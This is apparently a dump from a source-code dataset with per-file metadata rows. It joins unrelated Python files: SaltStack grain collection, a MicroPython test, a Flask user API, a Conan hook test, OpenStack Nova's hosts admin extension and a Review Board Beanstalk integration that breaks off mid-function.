# of information. With that said, consolidate the output from various
# commands and attempt various lookups.
data = ""
for (cmd, args) in (('/usr/sbin/prtdiag', '-v'), ('/usr/sbin/prtconf', '-vp'), ('/usr/sbin/virtinfo', '-a')):
if salt.utils.which(cmd): # Also verifies that cmd is executable
data += __salt__['cmd.run']('{0} {1}'.format(cmd, args))
data += '\n'
sn_regexes = [
re.compile(r) for r in [
r'(?im)^\s*Chassis\s+Serial\s+Number\n-+\n(\S+)', # prtdiag
r'(?im)^\s*chassis-sn:\s*(\S+)', # prtconf
r'(?im)^\s*Chassis\s+Serial#:\s*(\S+)', # virtinfo
]
]
obp_regexes = [
re.compile(r) for r in [
r'(?im)^\s*System\s+PROM\s+revisions.*\nVersion\n-+\nOBP\s+(\S+)\s+(\S+)', # prtdiag
r'(?im)^\s*version:\s*\'OBP\s+(\S+)\s+(\S+)', # prtconf
]
]
fw_regexes = [
re.compile(r) for r in [
r'(?im)^\s*Sun\s+System\s+Firmware\s+(\S+)\s+(\S+)', # prtdiag
]
]
uuid_regexes = [
re.compile(r) for r in [
r'(?im)^\s*Domain\s+UUID:\s*(\S+)', # virtinfo
]
]
manufacture_regexes = [
re.compile(r) for r in [
r'(?im)^\s*System\s+Configuration:\s*(.*)(?=sun)', # prtdiag
]
]
product_regexes = [
re.compile(r) for r in [
r'(?im)^\s*System\s+Configuration:\s*.*?sun\d\S+\s(.*)', # prtdiag
r'(?im)^\s*banner-name:\s*(.*)', # prtconf
r'(?im)^\s*product-name:\s*(.*)', # prtconf
]
]
sn_regexes = [
re.compile(r) for r in [
r'(?im)Chassis\s+Serial\s+Number\n-+\n(\S+)', # prtdiag
r'(?i)Chassis\s+Serial#:\s*(\S+)', # virtinfo
r'(?i)chassis-sn:\s*(\S+)', # prtconf
]
]
obp_regexes = [
re.compile(r) for r in [
r'(?im)System\s+PROM\s+revisions.*\nVersion\n-+\nOBP\s+(\S+)\s+(\S+)', # prtdiag
r'(?im)version:\s*\'OBP\s+(\S+)\s+(\S+)', # prtconf
]
]
fw_regexes = [
re.compile(r) for r in [
r'(?i)Sun\s+System\s+Firmware\s+(\S+)\s+(\S+)', # prtdiag
]
]
uuid_regexes = [
re.compile(r) for r in [
r'(?i)Domain\s+UUID:\s+(\S+)', # virtinfo
]
]
for regex in sn_regexes:
res = regex.search(data)
if res and len(res.groups()) >= 1:
grains['serialnumber'] = res.group(1).strip().replace("'", "")
break
for regex in obp_regexes:
res = regex.search(data)
if res and len(res.groups()) >= 1:
obp_rev, obp_date = res.groups()[0:2] # Limit the number in case we found the data in multiple places
grains['biosversion'] = obp_rev.strip().replace("'", "")
grains['biosreleasedate'] = obp_date.strip().replace("'", "")
for regex in fw_regexes:
res = regex.search(data)
if res and len(res.groups()) >= 1:
fw_rev, fw_date = res.groups()[0:2]
grains['systemfirmware'] = fw_rev.strip().replace("'", "")
grains['systemfirmwaredate'] = fw_date.strip().replace("'", "")
break
for regex in uuid_regexes:
res = regex.search(data)
if res and len(res.groups()) >= 1:
grains['uuid'] = res.group(1).strip().replace("'", "")
break
for regex in manufacture_regexes:
res = regex.search(data)
if res and len(res.groups()) >= 1:
grains['manufacture'] = res.group(1).strip().replace("'", "")
break
for regex in product_regexes:
res = regex.search(data)
if res and len(res.groups()) >= 1:
grains['product'] = res.group(1).strip().replace("'", "")
break
return grains
def _smartos_computenode_data():
'''
Return useful information from a SmartOS compute node
'''
# Provides:
# vms_total
# vms_running
# vms_stopped
# sdc_version
# vm_capable
# vm_hw_virt
if salt.utils.is_proxy():
return {}
grains = {}
# *_vms grains
grains['computenode_vms_total'] = len(__salt__['cmd.run']('vmadm list -p').split("\n"))
grains['computenode_vms_running'] = len(__salt__['cmd.run']('vmadm list -p state=running').split("\n"))
grains['computenode_vms_stopped'] = len(__salt__['cmd.run']('vmadm list -p state=stopped').split("\n"))
# sysinfo derived grains
sysinfo = json.loads(__salt__['cmd.run']('sysinfo'))
grains['computenode_sdc_version'] = sysinfo['SDC Version']
grains['computenode_vm_capable'] = sysinfo['VM Capable']
if sysinfo['VM Capable']:
grains['computenode_vm_hw_virt'] = sysinfo['CPU Virtualization']
# sysinfo derived smbios grains
grains['manufacturer'] = sysinfo['Manufacturer']
grains['productname'] = sysinfo['Product']
grains['uuid'] = sysinfo['UUID']
return grains
def _smartos_zone_data():
'''
Return useful information from a SmartOS zone
'''
# Provides:
# pkgsrcversion
# imageversion
# pkgsrcpath
# zonename
# zoneid
# hypervisor_uuid
# datacenter
if salt.utils.is_proxy():
return {}
grains = {}
pkgsrcversion = re.compile('^release:\\s(.+)')
imageversion = re.compile('Image:\\s(.+)')
pkgsrcpath = re.compile('PKG_PATH=(.+)')
if os.path.isfile('/etc/pkgsrc_version'):
with salt.utils.fopen('/etc/pkgsrc_version', 'r') as fp_:
for line in fp_:
match = pkgsrcversion.match(line)
if match:
grains['pkgsrcversion'] = match.group(1)
if os.path.isfile('/etc/product'):
with salt.utils.fopen('/etc/product', 'r') as fp_:
for line in fp_:
match = imageversion.match(line)
if match:
grains['imageversion'] = match.group(1)
if os.path.isfile('/opt/local/etc/pkg_install.conf'):
with salt.utils.fopen('/opt/local/etc/pkg_install.conf', 'r') as fp_:
for line in fp_:
match = pkgsrcpath.match(line)
if match:
grains['pkgsrcpath'] = match.group(1)
if 'pkgsrcversion' not in grains:
grains['pkgsrcversion'] = 'Unknown'
if 'imageversion' not in grains:
grains['imageversion'] = 'Unknown'
if 'pkgsrcpath' not in grains:
grains['pkgsrcpath'] = 'Unknown'
grains['zonename'] = __salt__['cmd.run']('zonename')
grains['zoneid'] = __salt__['cmd.run']('zoneadm list -p | awk -F: \'{ print $1 }\'', python_shell=True)
grains.update(_mdata())
return grains
def _mdata():
'''
Provide grains from the SmartOS metadata
'''
grains = {}
mdata_list = salt.utils.which('mdata-list')
mdata_get = salt.utils.which('mdata-get')
# parse sdc metadata
grains['hypervisor_uuid'] = __salt__['cmd.run']('{0} sdc:server_uuid'.format(mdata_get))
if "FAILURE" in grains['hypervisor_uuid'] or "No metadata" in grains['hypervisor_uuid']:
grains['hypervisor_uuid'] = "Unknown"
grains['datacenter'] = __salt__['cmd.run']('{0} sdc:datacenter_name'.format(mdata_get))
if "FAILURE" in grains['datacenter'] or "No metadata" in grains['datacenter']:
grains['datacenter'] = "Unknown"
# parse vmadm metadata
for mdata_grain in __salt__['cmd.run'](mdata_list).splitlines():
grain_data = __salt__['cmd.run']('{0} {1}'.format(mdata_get, mdata_grain))
if mdata_grain == 'roles': # parse roles as roles grain
grain_data = grain_data.split(',')
grains['roles'] = grain_data
else: # parse other grains into mdata
if not mdata_grain.startswith('sdc:'):
if 'mdata' not in grains:
grains['mdata'] = {}
mdata_grain = mdata_grain.replace('-', '_')
mdata_grain = mdata_grain.replace(':', '_')
grains['mdata'][mdata_grain] = grain_data
return grains
def _zpool_data(grains):
'''
Provide grains about zpools
'''
# quickly return if windows or proxy
if salt.utils.is_windows() or 'proxyminion' in __opts__:
return {}
# quickly return if no zpool and zfs command
if not salt.utils.which('zpool'):
return {}
# collect zpool data
zpool_grains = {}
for zpool in __salt__['cmd.run']('zpool list -H -o name,size').splitlines():
zpool = zpool.split()
zpool_grains[zpool[0]] = zpool[1]
# return grain data
if len(zpool_grains.keys()) < 1:
return {}
return {'zpool': zpool_grains}
def get_server_id():
'''
Provides an integer based on the FQDN of a machine.
Useful as server-id in MySQL replication or anywhere else you'll need an ID
like this.
'''
# Provides:
# server_id
if salt.utils.is_proxy():
return {}
return {'server_id': abs(hash(__opts__.get('id', '')) % (2 ** 31))}
def get_master():
'''
Provides the minion with the name of its master.
This is useful in states to target other services running on the master.
'''
# Provides:
# master
return {'master': __opts__.get('master', '')}
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
| 37.653992 | 118 | 0.533778 |
f2a372f307018a3377c73eec9ffb49a9d91f5b12 | 63 | py | Python | tests/basics/set_add.py | bygreencn/micropython | 3f759b71c63f5e01df18a6e204c50f78d1b6a20b | [
"MIT"
] | 1 | 2019-05-07T15:01:19.000Z | 2019-05-07T15:01:19.000Z | tests/basics/set_add.py | bygreencn/micropython | 3f759b71c63f5e01df18a6e204c50f78d1b6a20b | [
"MIT"
] | null | null | null | tests/basics/set_add.py | bygreencn/micropython | 3f759b71c63f5e01df18a6e204c50f78d1b6a20b | [
"MIT"
] | null | null | null | s = {1, 2, 3, 4}
print(s.add(5))
l = list(s)
l.sort()
print(l)
| 10.5 | 16 | 0.507937 |
3aa1eed2c29b7732383f5dafc5657f122aec68f8 | 1,196 | py | Python | boilerplate/app/controllers/user.py | davideasaf/effortless_rest_flask | ee96069614aa670837152db36616b847f1cb5f73 | [
"MIT"
] | null | null | null | boilerplate/app/controllers/user.py | davideasaf/effortless_rest_flask | ee96069614aa670837152db36616b847f1cb5f73 | [
"MIT"
] | null | null | null | boilerplate/app/controllers/user.py | davideasaf/effortless_rest_flask | ee96069614aa670837152db36616b847f1cb5f73 | [
"MIT"
] | 1 | 2021-06-30T19:53:57.000Z | 2021-06-30T19:53:57.000Z | "User Controller"
from flask import abort, jsonify, request
from flask_accepts import responds, accepts
from flask_praetorian import roles_required
from flask_restx import Namespace, Resource
from app import api, guard
from app.models import User
from app.schemas import UserSchema, UserLoginSchema
# Create a namespace and attach to main API
user_api = Namespace("User", description="User Resources")
#
# REST + Examples
#
# Attach routes to namespace
# With flask-accepts, you no longer have to manually dump on the return statement.
# You can define all the request and response expectations on the route itself.
@user_api.route("/")
@user_api.doc(security="jwt")
class UserResourceFlaskAccepts(Resource):
@responds(schema=UserSchema(many=True), api=api)
@roles_required("admin")
def get(self):
users = User.query.all()
return users
@user_api.route("/<int:user_id>")
@user_api.doc(security="jwt")
class UserIdResourceNamespace(Resource):
@roles_required("admin")
def get(self, user_id: int):
user = User.query.get(user_id)
if not user:
abort(404, "User was not found")
return jsonify(UserSchema().dump(user))
| 26 | 82 | 0.726589 |
8c9cbe4a8083edbe6b890fe0e8ff6307cacf0c18 | 1,644 | py | Python | tests/test_hooks/conan-center/test_global_cppstd.py | Minimonium/hooks | 92a4ade551dab17c497244f42dc51328cc7fee2e | [
"MIT"
] | 24 | 2019-01-07T11:55:32.000Z | 2022-03-23T18:11:34.000Z | tests/test_hooks/conan-center/test_global_cppstd.py | Minimonium/hooks | 92a4ade551dab17c497244f42dc51328cc7fee2e | [
"MIT"
] | 308 | 2018-11-20T19:11:16.000Z | 2022-03-30T05:35:31.000Z | tests/test_hooks/conan-center/test_global_cppstd.py | Minimonium/hooks | 92a4ade551dab17c497244f42dc51328cc7fee2e | [
"MIT"
] | 31 | 2018-12-11T16:41:37.000Z | 2021-12-03T15:44:44.000Z | import os
import textwrap
from conans import tools
from tests.utils.test_cases.conan_client import ConanClientTestCase
class TestGlobalCPPSTD(ConanClientTestCase):
conanfile = textwrap.dedent("""\
from conans import ConanFile
class AConan(ConanFile):
settings = "cppstd"
""")
def _get_environ(self, **kwargs):
kwargs = super(TestGlobalCPPSTD, self)._get_environ(**kwargs)
kwargs.update({'CONAN_HOOKS': os.path.join(os.path.dirname(__file__), '..', '..', '..',
'hooks', 'conan-center')})
return kwargs
def test_forbidden_usage(self):
tools.save('conanfile.py', content=self.conanfile)
output = self.conan(['export', '.', 'name/version@user/channel'])
self.assertIn("ERROR: [DEPRECATED GLOBAL CPPSTD (KB-H001)] The 'cppstd' setting is deprecated. "
"Use the 'compiler.cppstd' subsetting instead", output)
def test_forbidden_usage_multi_settings(self):
tools.save('conanfile.py', content=self.conanfile.replace('"cppstd"', '"cppstd", "os"'))
output = self.conan(['export', '.', 'name/version@user/channel'])
self.assertIn("ERROR: [DEPRECATED GLOBAL CPPSTD (KB-H001)] The 'cppstd' setting is deprecated. "
"Use the 'compiler.cppstd' subsetting instead", output)
def test_ok_usage(self):
tools.save('conanfile.py', content=self.conanfile.replace("cppstd", "os"))
output = self.conan(['export', '.', 'name/version@user/channel'])
self.assertNotIn("ERROR: [GLOBAL CPPSTD DEPRECATED] ", output)
| 41.1 | 104 | 0.63017 |
b08652b4a038535d44fa59b8b1eb9bcbda79081b | 502 | py | Python | web/dotfiles/http_lib.py | umi0451/dotfiles | c618811be788d995fe01f6a16b355828d7efdd36 | [
"MIT"
] | null | null | null | web/dotfiles/http_lib.py | umi0451/dotfiles | c618811be788d995fe01f6a16b355828d7efdd36 | [
"MIT"
] | null | null | null | web/dotfiles/http_lib.py | umi0451/dotfiles | c618811be788d995fe01f6a16b355828d7efdd36 | [
"MIT"
] | null | null | null | import bottle
from pathlib import Path
from clckwrkbdgr import xdg
ROOTDIR = Path(__file__).parent
@bottle.route('/lib/<javascript_module>.js')
def host_dotfiles_js_library(javascript_module):
bottle.response.content_type = 'application/javascript'
return (xdg.save_config_path('lib')/'{0}.js'.format(javascript_module)).read_text()
@bottle.route('/lib/test/userscript')
@bottle.route('/lib/test/userscript_with_grant')
def test_userscripts():
return (ROOTDIR/'test_userscript.html').read_text()
| 31.375 | 84 | 0.788845 |
8902b377abce9e95f359ec8084b381df4d0810ad | 14,182 | py | Python | nova/api/openstack/compute/legacy_v2/contrib/hosts.py | patanric/nova-fairness | 559f121190f3d71f7e3067e688b50d3d6d16e383 | [
"Apache-2.0"
] | 1 | 2015-02-26T03:23:49.000Z | 2015-02-26T03:23:49.000Z | nova/api/openstack/compute/legacy_v2/contrib/hosts.py | patanric/nova-fairness | 559f121190f3d71f7e3067e688b50d3d6d16e383 | [
"Apache-2.0"
] | null | null | null | nova/api/openstack/compute/legacy_v2/contrib/hosts.py | patanric/nova-fairness | 559f121190f3d71f7e3067e688b50d3d6d16e383 | [
"Apache-2.0"
] | 2 | 2015-06-17T13:24:55.000Z | 2015-10-27T05:28:38.000Z | # Copyright (c) 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The hosts admin extension."""
from oslo_log import log as logging
import six
import webob.exc
from nova.api.openstack import extensions
from nova import compute
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LI
from nova import objects
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'hosts')
class HostController(object):
"""The Hosts API controller for the OpenStack API."""
def __init__(self):
self.api = compute.HostAPI()
super(HostController, self).__init__()
def index(self, req):
"""Returns a dict in the format:
| {'hosts': [{'host_name': 'some.host.name',
| 'service': 'cells',
| 'zone': 'internal'},
| {'host_name': 'some.other.host.name',
| 'service': 'cells',
| 'zone': 'internal'},
| {'host_name': 'some.celly.host.name',
| 'service': 'cells',
| 'zone': 'internal'},
| {'host_name': 'console1.host.com',
| 'service': 'consoleauth',
| 'zone': 'internal'},
| {'host_name': 'network1.host.com',
| 'service': 'network',
| 'zone': 'internal'},
| {'host_name': 'netwwork2.host.com',
| 'service': 'network',
| 'zone': 'internal'},
| {'host_name': 'compute1.host.com',
| 'service': 'compute',
| 'zone': 'nova'},
| {'host_name': 'compute2.host.com',
| 'service': 'compute',
| 'zone': 'nova'},
| {'host_name': 'sched1.host.com',
| 'service': 'scheduler',
| 'zone': 'internal'},
| {'host_name': 'sched2.host.com',
| 'service': 'scheduler',
| 'zone': 'internal'},
| {'host_name': 'vol1.host.com',
| 'service': 'volume',
| 'zone': 'internal'}]}
"""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks
nova_context.require_admin_context(context)
filters = {'disabled': False}
zone = req.GET.get('zone', None)
if zone:
filters['availability_zone'] = zone
services = self.api.service_get_all(context, filters=filters,
set_zones=True)
hosts = []
api_services = ('nova-osapi_compute', 'nova-ec2', 'nova-metadata')
for service in services:
if service.binary not in api_services:
hosts.append({'host_name': service['host'],
'service': service['topic'],
'zone': service['availability_zone']})
return {'hosts': hosts}
def update(self, req, id, body):
"""Updates a specified body.
:param body: example format {'status': 'enable',
'maintenance_mode': 'enable'}
"""
def read_enabled(orig_val, msg):
"""Checks a specified orig_val and returns True for 'enabled'
and False for 'disabled'.
:param orig_val: A string with either 'enable' or 'disable'. May
be surrounded by whitespace, and case doesn't
matter
:param msg: The message to be passed to HTTPBadRequest. A single
%s will be replaced with orig_val.
"""
val = orig_val.strip().lower()
if val == "enable":
return True
elif val == "disable":
return False
else:
raise webob.exc.HTTPBadRequest(explanation=msg % orig_val)
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks. This has to be left only for API v2.0 because
# this version has to be stable even if it means that only admins
# can call this method while the policy could be changed.
nova_context.require_admin_context(context)
# See what the user wants to 'update'
params = {k.strip().lower(): v for k, v in six.iteritems(body)}
orig_status = status = params.pop('status', None)
orig_maint_mode = maint_mode = params.pop('maintenance_mode', None)
# Validate the request
if len(params) > 0:
# Some extra param was passed. Fail.
explanation = _("Invalid update setting: '%s'") % list(
params.keys())[0]
raise webob.exc.HTTPBadRequest(explanation=explanation)
if orig_status is not None:
status = read_enabled(orig_status, _("Invalid status: '%s'"))
if orig_maint_mode is not None:
maint_mode = read_enabled(orig_maint_mode, _("Invalid mode: '%s'"))
if status is None and maint_mode is None:
explanation = _("'status' or 'maintenance_mode' needed for "
"host update")
raise webob.exc.HTTPBadRequest(explanation=explanation)
# Make the calls and merge the results
result = {'host': id}
if status is not None:
result['status'] = self._set_enabled_status(context, id, status)
if maint_mode is not None:
result['maintenance_mode'] = self._set_host_maintenance(context,
id, maint_mode)
return result
def _set_host_maintenance(self, context, host_name, mode=True):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation.
"""
LOG.info(_LI("Putting host %(host_name)s in maintenance mode "
"%(mode)s."),
{'host_name': host_name, 'mode': mode})
try:
result = self.api.set_host_maintenance(context, host_name, mode)
except NotImplementedError:
msg = _("Virt driver does not implement host maintenance mode.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
if result not in ("on_maintenance", "off_maintenance"):
raise webob.exc.HTTPBadRequest(explanation=result)
return result
def _set_enabled_status(self, context, host_name, enabled):
"""Sets the specified host's ability to accept new instances.
:param enabled: a boolean - if False no new VMs will be able to start
on the host
"""
if enabled:
LOG.info(_LI("Enabling host %s."), host_name)
else:
LOG.info(_LI("Disabling host %s."), host_name)
try:
result = self.api.set_host_enabled(context, host_name=host_name,
enabled=enabled)
except NotImplementedError:
msg = _("Virt driver does not implement host disabled status.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
if result not in ("enabled", "disabled"):
raise webob.exc.HTTPBadRequest(explanation=result)
return result
def _host_power_action(self, req, host_name, action):
"""Reboots, shuts down or powers up the host."""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks. This has to be left only for API v2.0 because
# this version has to be stable even if it means that only admins
# can call this method while the policy could be changed.
nova_context.require_admin_context(context)
try:
result = self.api.host_power_action(context, host_name=host_name,
action=action)
except NotImplementedError:
msg = _("Virt driver does not implement host power management.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
return {"host": host_name, "power_action": result}
def startup(self, req, id):
return self._host_power_action(req, host_name=id, action="startup")
def shutdown(self, req, id):
return self._host_power_action(req, host_name=id, action="shutdown")
def reboot(self, req, id):
return self._host_power_action(req, host_name=id, action="reboot")
@staticmethod
def _get_total_resources(host_name, compute_node):
return {'resource': {'host': host_name,
'project': '(total)',
'cpu': compute_node['vcpus'],
'memory_mb': compute_node['memory_mb'],
'disk_gb': compute_node['local_gb']}}
@staticmethod
def _get_used_now_resources(host_name, compute_node):
return {'resource': {'host': host_name,
'project': '(used_now)',
'cpu': compute_node['vcpus_used'],
'memory_mb': compute_node['memory_mb_used'],
'disk_gb': compute_node['local_gb_used']}}
@staticmethod
def _get_resource_totals_from_instances(host_name, instances):
cpu_sum = 0
mem_sum = 0
hdd_sum = 0
for instance in instances:
cpu_sum += instance['vcpus']
mem_sum += instance['memory_mb']
hdd_sum += instance['root_gb'] + instance['ephemeral_gb']
return {'resource': {'host': host_name,
'project': '(used_max)',
'cpu': cpu_sum,
'memory_mb': mem_sum,
'disk_gb': hdd_sum}}
@staticmethod
def _get_resources_by_project(host_name, instances):
# Getting usage resource per project
project_map = {}
for instance in instances:
resource = project_map.setdefault(instance['project_id'],
{'host': host_name,
'project': instance['project_id'],
'cpu': 0,
'memory_mb': 0,
'disk_gb': 0})
resource['cpu'] += instance['vcpus']
resource['memory_mb'] += instance['memory_mb']
resource['disk_gb'] += (instance['root_gb'] +
instance['ephemeral_gb'])
return project_map
def show(self, req, id):
"""Shows the physical/usage resource given by hosts.
:param id: hostname
:returns: expected to use HostShowTemplate.
ex.::
{'host': {'resource':D},..}
D: {'host': 'hostname','project': 'admin',
'cpu': 1, 'memory_mb': 2048, 'disk_gb': 30}
"""
context = req.environ['nova.context']
# NOTE(eliqiao): back-compatible with db layer hard-code admin
# permission checks. This has to be left only for API v2.0 because
# this version has to be stable even if it means that only admins
# can call this method while the policy could be changed.
nova_context.require_admin_context(context)
host_name = id
try:
compute_node = (
objects.ComputeNode.get_first_node_by_host_for_old_compat(
context, host_name))
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
instances = self.api.instance_get_all_by_host(context, host_name)
resources = [self._get_total_resources(host_name, compute_node)]
resources.append(self._get_used_now_resources(host_name,
compute_node))
resources.append(self._get_resource_totals_from_instances(host_name,
instances))
by_proj_resources = self._get_resources_by_project(host_name,
instances)
for resource in six.itervalues(by_proj_resources):
resources.append({'resource': resource})
return {'host': resources}
class Hosts(extensions.ExtensionDescriptor):
"""Admin-only host administration."""
name = "Hosts"
alias = "os-hosts"
namespace = "http://docs.openstack.org/compute/ext/hosts/api/v1.1"
updated = "2011-06-29T00:00:00Z"
def get_resources(self):
resources = [extensions.ResourceExtension('os-hosts',
HostController(),
collection_actions={'update': 'PUT'},
member_actions={"startup": "GET", "shutdown": "GET",
"reboot": "GET"})]
return resources
| 42.208333 | 79 | 0.577563 |
14015077d508b7e219a8273c1bf7783b221f6ff3 | 1,485 | py | Python | src/triangulum/utils/cl.py | PolarNick239/Triangulum3D | 85c6a44f5c8f620bdc58164bd50ff89e1897f59d | [
"MIT"
] | 10 | 2016-09-18T01:38:46.000Z | 2021-11-18T17:30:28.000Z | src/triangulum/utils/cl.py | PolarNick239/Triangulum3D | 85c6a44f5c8f620bdc58164bd50ff89e1897f59d | [
"MIT"
] | 1 | 2018-06-20T05:48:19.000Z | 2018-06-20T09:19:56.000Z | src/triangulum/utils/cl.py | PolarNick239/Triangulum3D | 85c6a44f5c8f620bdc58164bd50ff89e1897f59d | [
"MIT"
] | 12 | 2015-11-29T03:22:37.000Z | 2020-07-14T03:08:52.000Z | #
# Copyright (c) 2015, Transas
# All rights reserved.
#
import logging
import pyopencl as cl
logger = logging.getLogger(__name__)
def create_context():
platforms = cl.get_platforms()
logger.debug('OpenCL platforms: {}'.format(['{}: {}.'.format(platform.get_info(cl.platform_info.VENDOR),
platform.get_info(cl.platform_info.NAME))
for platform in platforms]))
device_to_use = None
for device_type, type_str in [(cl.device_type.GPU, 'GPU'), (cl.device_type.CPU, 'CPU')]:
for platform in platforms:
devices = platform.get_devices(device_type)
if len(devices) > 0:
logger.debug('OpenCL {} devices in {}: {}.'.format(type_str,
platform.get_info(cl.platform_info.NAME),
[device.get_info(cl.device_info.NAME) for device in devices]))
if device_to_use is None:
device_to_use = devices[0]
logger.info('OpenCL device to use: {} {}'.format(platform.get_info(cl.platform_info.NAME),
devices[0].get_info(cl.device_info.NAME)))
if device_to_use is None:
raise Exception('No OpenCL CPU or GPU device found!')
return cl.Context([device_to_use])
| 46.40625 | 129 | 0.525253 |
2913e5e3997cf60678f210784ad76ac271fbea7d | 10,303 | py | Python | reviewboard/hostingsvcs/beanstalk.py | mnoorenberghe/reviewboard | b8ba9d662c250cb5ec704a50f619adbf3be8cbf0 | [
"MIT"
] | null | null | null | reviewboard/hostingsvcs/beanstalk.py | mnoorenberghe/reviewboard | b8ba9d662c250cb5ec704a50f619adbf3be8cbf0 | [
"MIT"
] | null | null | null | reviewboard/hostingsvcs/beanstalk.py | mnoorenberghe/reviewboard | b8ba9d662c250cb5ec704a50f619adbf3be8cbf0 | [
"MIT"
] | 1 | 2021-11-23T15:25:44.000Z | 2021-11-23T15:25:44.000Z | from __future__ import unicode_literals
import json
import logging
import os
from collections import defaultdict
from django import forms
from django.conf.urls import patterns, url
from django.http import HttpResponse
from django.utils import six
from django.utils.six.moves.urllib.error import HTTPError, URLError
from django.utils.six.moves.urllib.parse import quote
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.http import require_POST
from reviewboard.admin.server import get_server_url
from reviewboard.hostingsvcs.forms import HostingServiceForm
from reviewboard.hostingsvcs.hook_utils import (close_all_review_requests,
get_review_request_id)
from reviewboard.hostingsvcs.service import HostingService
from reviewboard.scmtools.crypto_utils import (decrypt_password,
encrypt_password)
from reviewboard.scmtools.errors import FileNotFoundError
class BeanstalkForm(HostingServiceForm):
beanstalk_account_domain = forms.CharField(
label=_('Beanstalk account domain'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('This is the <tt>domain</tt> part of '
'<tt>domain.beanstalkapp.com</tt>'))
beanstalk_repo_name = forms.CharField(
label=_('Repository name'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}))
class Beanstalk(HostingService):
"""Hosting service support for Beanstalk.
Beanstalk is a source hosting service that supports Git and Subversion
repositories. It's available at http://beanstalkapp.com/.
"""
name = 'Beanstalk'
needs_authorization = True
supports_bug_trackers = False
supports_repositories = True
supported_scmtools = ['Git', 'Subversion']
form = BeanstalkForm
repository_fields = {
'Git': {
'path': 'git@%(beanstalk_account_domain)s'
'.beanstalkapp.com:/%(beanstalk_account_domain)s/'
'%(beanstalk_repo_name)s.git',
'mirror_path': 'https://%(beanstalk_account_domain)s'
'.git.beanstalkapp.com/%(beanstalk_repo_name)s.git',
},
'Subversion': {
'path': 'https://%(beanstalk_account_domain)s'
'.svn.beanstalkapp.com/%(beanstalk_repo_name)s/',
},
}
repository_url_patterns = patterns(
'',
url(r'^hooks/post-receive/$',
'reviewboard.hostingsvcs.beanstalk.process_post_receive_hook'),
)
def check_repository(self, beanstalk_account_domain=None,
beanstalk_repo_name=None, *args, **kwargs):
"""Checks the validity of a repository.
This will perform an API request against Beanstalk to get
information on the repository. This will throw an exception if
the repository was not found, and return cleanly if it was found.
"""
self._api_get_repository(beanstalk_account_domain, beanstalk_repo_name)
def authorize(self, username, password, hosting_url,
local_site_name=None, *args, **kwargs):
"""Authorizes the Beanstalk repository.
Beanstalk uses HTTP Basic Auth for the API, so this will store the
provided password, encrypted, for use in later API requests.
"""
self.account.data['password'] = encrypt_password(password)
self.account.save()
def is_authorized(self):
"""Determines if the account has supported authorization tokens.
This just checks if there's a password set on the account.
"""
return self.account.data.get('password', None) is not None
def get_password(self):
"""Returns the password for this account.
This is needed for API calls and for Subversion.
"""
return decrypt_password(self.account.data['password'])
def get_file(self, repository, path, revision, base_commit_id=None,
*args, **kwargs):
"""Fetches a file from Beanstalk.
This will perform an API request to fetch the contents of a file.
If using Git, this will expect a base commit ID to be provided.
"""
try:
return self._api_get_node(repository, path, revision,
base_commit_id, contents=True)
except (HTTPError, URLError):
raise FileNotFoundError(path, revision)
def get_file_exists(self, repository, path, revision, base_commit_id=None,
*args, **kwargs):
"""Determines if a file exists.
This will perform an API request to fetch the metadata for a file.
If using Git, this will expect a base commit ID to be provided.
"""
try:
self._api_get_node(repository, path, revision, base_commit_id)
return True
except (HTTPError, URLError, FileNotFoundError):
return False
def _api_get_repository(self, account_domain, repository_name):
url = self._build_api_url(account_domain,
'repositories/%s.json' % repository_name)
return self._api_get(url)
def _api_get_node(self, repository, path, revision, base_commit_id,
contents=False):
# Unless we're fetching raw content, we optimistically want to
# grab the metadata for the file. That's going to be a lot smaller
# than the file contents in most cases. However, we can only do that
# with a base_commit_id. If we don't have that, we fall back on
# fetching the full file contents.
is_git = (repository.tool.name == 'Git')
if is_git and (contents or not base_commit_id):
url_path = ('blob?id=%s&name=%s'
% (quote(revision), quote(os.path.basename(path))))
raw_content = True
else:
if is_git:
expected_revision = base_commit_id
else:
expected_revision = revision
url_path = ('node.json?path=%s&revision=%s'
% (quote(path), quote(expected_revision)))
if contents:
url_path += '&contents=1'
raw_content = False
url = self._build_api_url(
self._get_repository_account_domain(repository),
'repositories/%s/%s'
% (repository.extra_data['beanstalk_repo_name'], url_path))
result = self._api_get(url, raw_content=raw_content)
if not raw_content and contents:
result = result['contents']
return result
def _build_api_url(self, account_domain, url):
return 'https://%s.beanstalkapp.com/api/%s' % (account_domain, url)
def _get_repository_account_domain(self, repository):
return repository.extra_data['beanstalk_account_domain']
def _api_get(self, url, raw_content=False):
try:
data, headers = self.client.http_get(
url,
username=self.account.username,
password=self.get_password())
if raw_content:
return data
else:
return json.loads(data)
except HTTPError as e:
data = e.read()
try:
rsp = json.loads(data)
except:
